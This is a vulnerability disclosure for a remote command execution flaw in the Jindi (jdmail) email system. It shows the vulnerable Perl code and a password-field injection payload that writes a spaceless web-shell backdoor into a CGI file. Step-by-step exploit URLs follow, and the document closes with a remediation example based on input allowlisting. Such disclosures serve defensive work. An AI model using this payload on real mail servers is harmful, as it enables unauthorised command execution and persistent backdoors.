Jindi email system Remote Command Execution
The Jindi email system is a distributed, large-capacity, high-availability email system developed over many years by Jindi Software. It is built on open technologies such as Linux, XML, and Java, providing high reliability and scalability. It is widely used in e-government websites, Golden Tax projects, IDCs, and portal websites of various industries.
Test version: jdmail3.14.6.1
Precondition: user registration is allowed.
Vulnerability Analysis:
First, register an account; the registration is sent to the administrator for review. For example, with the user name test, change the domain name address:
Username: test
On Windows, set the password to: 1|echo:system($B=$cgi-^>param(a)>user_verify_disagree.cgi;
The official website is the Linux version. The local Windows test was successful.
In jdwa/cgi/config.cgi, the system function is called to run a command:

    sub ctrlcmd {
        my ($cmd, $op1) = @_;
        my $rep;
        my $port = $cfg{'ctrlprt'};
        $port = '000000' if !$port;
        my $admin = &dec_str($cfg{'admin'});
        my $pass = &dec_str($cfg{'pass'});
        # Command line for the control client, built as a single string
        my $ctrl = "$cfg{'jdmaildir'}/$ctrlclnt -s localhost -n $port -u \"$admin\" -p \"$pass\"";
        if (!$op1) {
            # $cmd is interpolated into the string handed to the shell
            system("$ctrl $cmd");
        } else {
            $rep = `$ctrl $cmd`;
        }
        $rep;
    }

It is used in user_verify_agree.cgi:

    #!perl.exe
    if ($ENV{'server_soft'} =~ /IIS.\d+.0$/) {
        my $cd = $0;
        $cd =~ s/[^\\]*$//;
        chdir($cd);
    }
    require "config.cgi";
    use CGI;
    my $cgi = new CGI;
    my %users = ();
    my $number = 0;
    # "checkbox" comes straight from the request
    my $new_user = $cgi->param("checkbox");
    my ($name, $domain, $pass1, $realname, $depart, $question, $answer, $msg);
    $new_user =~ s/\s+$//;
    if (!$new_user || $new_user =~ /^\S+$/) {
        print "Content-Type: text/html; charset=UTF-8\n";
        print "CacheControl: no-cache\nPragma: no-cache\nExpires: -1\n";
        print qq~ <Html>
In the above process, special characters in the password are not filtered, resulting in command injection.
Restriction: spaces are not allowed.
Method: write a backdoor that contains no spaces into an existing file, replacing it.
Password: 1|echo:system($B=$cgi-^>param(a)>user_verify_disagree.cgi;
Test exp:
1. Register a user named test123 with the password: 1|echo:system($B=$cgi-^>param(a)>user_verify_disagree.cgi;
2. Access http://127.0.0.1/JDWA/cgi/user_verify_agree.cgi?checkbox=mailer.com.cn+test123
An error is reported during the review.
3. Access http://127.0.0.1/JDWA/cgi/user_verify_agree.cgi?a=dir
The access is successful and the directory can be written.
Solution:
Strengthen input filtering.
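One way to apply this filtering to a ctrlcmd-style helper, as an added example that is not code from JDMail or from the original write-up: request values are checked against an allowlist and the client is started with an argument list instead of an interpolated command string. The names is_safe_arg and run_ctrl, the command name useradd, the sample values, and the use of the Perl interpreter as a stand-in client are assumptions.

```perl
#!/usr/bin/perl
# Added example, not JDMail code. Function and command names are hypothetical.
use strict;
use warnings;
$| = 1;    # flush our output so it interleaves correctly with the child's

# Allowlist for request values that end up on the client's command line:
# letters, digits and a few punctuation marks, no shell metacharacters.
sub is_safe_arg {
    my ($v) = @_;
    return (defined($v) && $v =~ /\A[A-Za-z0-9_.\@-]{1,64}\z/) ? 1 : 0;
}

# Start the control client with an argument LIST, so nothing is interpolated
# into a command string. @$fixed comes from the program itself, @values from
# the request. Returns the exit status, or undef when a value is rejected.
sub run_ctrl {
    my ($client, $fixed, @values) = @_;
    for my $v (@values) {
        return undef unless is_safe_arg($v);
    }
    # Indirect-object form: $client is executed directly, never via a shell.
    return system { $client } $client, @$fixed, @values;
}

# Stand-in for the real client: the Perl interpreter echoing its arguments.
my @fixed = ('-e', 'print join(q{ }, q{client argv:}, @ARGV), qq{\n}');

# Constructed sample inputs: one ordinary value, one with shell metacharacters.
for my $pw ('S3cret.pw', '1|echo:x>out.cgi;') {
    my $rc = run_ctrl($^X, \@fixed, 'useradd', 'test', $pw);
    print defined $rc ? "accepted, exit=$rc\n" : "rejected: $pw\n";
}
```

On Windows, process creation still takes a single command-line string, so the allowlist check remains the primary control there.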